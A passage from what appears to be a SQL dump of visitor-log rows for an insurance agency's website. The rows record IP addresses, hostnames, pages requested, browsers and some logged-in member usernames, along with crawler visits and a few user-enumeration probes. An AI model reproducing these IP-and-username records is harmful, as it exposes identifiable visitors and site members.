http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25460,'0b_dc01232be738677c641b834fa911ff60','1462544290','158.69.241.154','ns526074.ip-158-69-241.net','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25463,'0b_dc01232be738677c641b834fa911ff60','1462544293','158.69.241.154','ns526074.ip-158-69-241.net','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25466,'0b_dc01232be738677c641b834fa911ff60','1462544297','158.69.241.154','ns526074.ip-158-69-241.net','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25467,'0b_dc01232be738677c641b834fa911ff60','1462544301','158.69.241.154','ns526074.ip-158-69-241.net','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25470,'0b_dc01232be738677c641b834fa911ff60','1462544303','158.69.241.154','ns526074.ip-158-69-241.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25472,'0b_03303f9a03dbab0d31b664040570a4c4','1462545175','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25475,'0b_03303f9a03dbab0d31b664040570a4c4','1462545176','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25476,'0b_b7f4674edcbf4bfe61559084dd14c9d1','1462545439','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25479,'0b_03303f9a03dbab0d31b664040570a4c4','1462545637','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25481,'0b_03303f9a03dbab0d31b664040570a4c4','1462545638','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25482,'0b_b7f4674edcbf4bfe61559084dd14c9d1','1462546399','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25485,'0b_03303f9a03dbab0d31b664040570a4c4','1462546418','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25488,'0b_03303f9a03dbab0d31b664040570a4c4','1462546419','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25491,'0b_03303f9a03dbab0d31b664040570a4c4','1462546478','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(25494,'0b_0004d818609ed13cdc4e48fe6af802f9','1462546814','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25497,'0b_f5f8905e782179aeaa4e325dee6a9915','1462546989','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25500,'0b_f5f8905e782179aeaa4e325dee6a9915','1462546991','69.175.22.218','newscan02.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25502,'0b_f5f8905e782179aeaa4e325dee6a9915','1462546992','69.175.22.218','newscan02.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25503,'0b_f5f8905e782179aeaa4e325dee6a9915','1462547134','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(25505,'0b_c69f0cd9da8a34027776f1477de55aee','1462548092','70.208.1.99','99.sub-70-208-1.myvzw.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25506,'0b_c69f0cd9da8a34027776f1477de55aee','1462548094','70.208.1.99','99.sub-70-208-1.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25509,'0b_c69f0cd9da8a34027776f1477de55aee','1462548102','70.208.1.99','99.sub-70-208-1.myvzw.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25512,'0b_c69f0cd9da8a34027776f1477de55aee','1462548112','70.208.1.99','99.sub-70-208-1.myvzw.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(25514,'0b_c69f0cd9da8a34027776f1477de55aee','1462548115','70.208.1.99','99.sub-70-208-1.myvzw.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','51',0),(25515,'0b_c69f0cd9da8a34027776f1477de55aee','1462548116','70.208.1.99','99.sub-70-208-1.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(25517,'0b_8f0cc6395ef54a4632d6395d331cc0dd','1462548416','195.154.199.235','electro.az-streamingserver.com','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25520,'0b_8f0cc6395ef54a4632d6395d331cc0dd','1462548417','195.154.199.235','electro.az-streamingserver.com','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25523,'0b_8f0cc6395ef54a4632d6395d331cc0dd','1462548420','195.154.199.235','electro.az-streamingserver.com','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25524,'0b_72282d2cb281b32a28df88d4c8f15b18','1462548665','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25527,'0b_72282d2cb281b32a28df88d4c8f15b18','1462548666','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25530,'0b_d26ea44ab80acc359f528f874fa0089f','1462550808','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25533,'0b_d26ea44ab80acc359f528f874fa0089f','1462550810','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25536,'0b_d43ba202542b43a0ec47cabceb173248','1462550826','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(25538,'0b_d43ba202542b43a0ec47cabceb173248','1462550827','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(25541,'0b_d43ba202542b43a0ec47cabceb173248','1462550831','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','0',0),(25544,'0b_d43ba202542b43a0ec47cabceb173248','1462550916','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','51',0),(25547,'0b_d43ba202542b43a0ec47cabceb173248','1462550935','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','171',0),(25550,'0b_d43ba202542b43a0ec47cabceb173248','1462550935','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','51',0),(25553,'0b_d43ba202542b43a0ec47cabceb173248','1462550940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','3','51',0),(25554,'0b_d26ea44ab80acc359f528f874fa0089f','1462550948','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25557,'0b_d26ea44ab80acc359f528f874fa0089f','1462550965','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(25560,'0b_556a9d88fe233b6ca1983a0cc0ac0e2e','1462551077','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4','http://znaniyapolza.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25563,'0b_f227023d6173955f4c4f4ad71e486c2e','1462551231','178.162.211.222','178.162.211.222','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','0','0',0),(25565,'0b_f227023d6173955f4c4f4ad71e486c2e','1462551241','178.162.211.222','178.162.211.222','/?author=1','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','0','0',0),(25568,'0b_c959555a8c1f17fc6f6442566e3fb843','1462552125','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(25569,'0b_1329d6a3cb255758f419783053d2bab0','1462552128','100.43.81.146','spider-100-43-81-146.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25572,'0b_34ff65343c97d36280bacd00e556e148','1462552177','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(25574,'0b_34ff65343c97d36280bacd00e556e148','1462552181','207.241.231.165','crawl339.us.archive.org','/left.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/','',0,'','','','','','org_bot','','','','0','0',0),(25575,'0b_34ff65343c97d36280bacd00e556e148','1462552183','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(25578,'0b_34ff65343c97d36280bacd00e556e148','1462552187','207.241.231.165','crawl339.us.archive.org','/left.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/left.html','',0,'','','','','','org_bot','','','','0','0',0),(25581,'0b_82c062ff507d2bcc1aa03514bd7d813c','1462552239','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25584,'0b_66b571e6f47d8cc854b91a88537db01b','1462553531','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','','','0','0',0),(25587,'0b_66b571e6f47d8cc854b91a88537db01b','1462553531','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','','','0','0',0),(25590,'0b_4a6f121f228f21e2cc107673228f2e29','1462553534','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(25592,'0b_4a6f121f228f21e2cc107673228f2e29','1462553542','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','51',0),(25593,'0b_66b571e6f47d8cc854b91a88537db01b','1462553546','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(25595,'0b_66b571e6f47d8cc854b91a88537db01b','1462553551','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(25596,'0b_4a6f121f228f21e2cc107673228f2e29','1462553555','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/?a=edit','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','51',0),(25598,'0b_66b571e6f47d8cc854b91a88537db01b','1462553556','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(25601,'0b_4a6f121f228f21e2cc107673228f2e29','1462553711','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','51',0),(25602,'0b_4a6f121f228f21e2cc107673228f2e29','1462553715','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','51',0),(25605,'0b_4a6f121f228f21e2cc107673228f2e29','1462553716','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','0',0),(25607,'0b_4a6f121f228f21e2cc107673228f2e29','1462553720','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','51',0),(25610,'0b_4a6f121f228f21e2cc107673228f2e29','1462553723','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','51',0),(25613,'0b_4adc49f2b7d98dcb8dfc8668445bc269','1462553821','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(25614,'0b_4adc49f2b7d98dcb8dfc8668445bc269','1462553823','62.210.143.245','mj8.naefmarco.ch','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(25617,'0b_4adc49f2b7d98dcb8dfc8668445bc269','1462553826','62.210.143.245','mj8.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(25619,'0b_4a6f121f228f21e2cc107673228f2e29','1462553967','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','cheskelb','','0','51',0),(25622,'0b_a0997bcdf644d250d03e5ef8360d9be9','1462554288','66.249.64.154','crawl-66-249-64-154.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25623,'0b_7e3a091f3e140de0e66cc41423020d77','1462555493','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25626,'0b_01bb87fd32b33728777de65bb512a0bc','1462557496','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25628,'0b_78280baf55494e08036653f4f7209810','1462558443','77.157.26.246','246.26.157.77.rev.sfr.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1','','',0,'Win7','Chrome 14','us','','','','','','','0','0',0),(25631,'0b_c558728baa389e696fb970498b30feb5','1462559103','46.4.32.75','static.75.32.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(25634,'0b_c558728baa389e696fb970498b30feb5','1462559107','46.4.32.75','static.75.32.4.46.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(25637,'0b_c558728baa389e696fb970498b30feb5','1462559109','46.4.32.75','static.75.32.4.46.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(25638,'0b_e4701eb7a3e692a34ebfad13a1103860','1462559138','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)','http://to.afora.ru/','',0,'WinCE','IE 3','','','','','','','','0','0',0),(25640,'0b_89321e0a8dc9090838fd38ae33b3b02f','1462559372','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25641,'0b_c558728baa389e696fb970498b30feb5','1462559378','46.4.32.75','static.75.32.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25644,'0b_c558728baa389e696fb970498b30feb5','1462559381','46.4.32.75','static.75.32.4.46.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25646,'0b_c558728baa389e696fb970498b30feb5','1462559382','46.4.32.75','static.75.32.4.46.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25649,'0b_bb03b53549b28f73d62e291fcd18c106','1462559465','188.143.232.43','188.143.232.43','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25652,'0b_140a33cd0ac58a1437e445633b21c82d','1462561226','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(25653,'0b_a2ae45eddd98f8ea13a1f4102e102319','1462562008','66.249.64.57','crawl-66-249-64-57.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25655,'0b_a2ae45eddd98f8ea13a1f4102e102319','1462562217','66.249.64.57','crawl-66-249-64-57.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25658,'0b_82062e34000b64dd206d73ecdd5a714f','1462562373','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/life-product-search/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25661,'0b_f0bd62eac396e89e8b576c7243af85fc','1462562762','141.8.143.235','spider-141-8-143-235.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25662,'0b_773344f3b60b3752f02c03d30907e36a','1462566780','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25665,'0b_32cb03c22be757554f9e96a8e419e50c','1462567562','46.4.123.172','static.172.123.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25667,'0b_32cb03c22be757554f9e96a8e419e50c','1462567565','46.4.123.172','static.172.123.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(25668,'0b_5ee49f075432ce1b6be8ddc5c7dbd7d7','1462567726','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(25670,'0b_002b4f89b3c6c712085c91e701bdf54c','1462567728','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://www.replica-watch.ru/','',0,'Win2003','IE 6','','','','','','','','0','0',0),(25673,'0b_66eeeac15f3a09230db47b409abe90cb','1462568630','100.43.81.152','spider-100-43-81-152.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25674,'0b_08f419aaf5d082af1301e00a05e5f284','1462569682','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.1; http://mortgageunpaid.com','','',0,'','','de','','','WordPress','','','','0','0',0),(25676,'0b_2639457c0c19ee3d65d281a0c39413e5','1462572788','180.76.15.137','baiduspider-180-76-15-137.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(25677,'0b_4016b90093db8ffb576a450bf49681b4','1462575622','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; 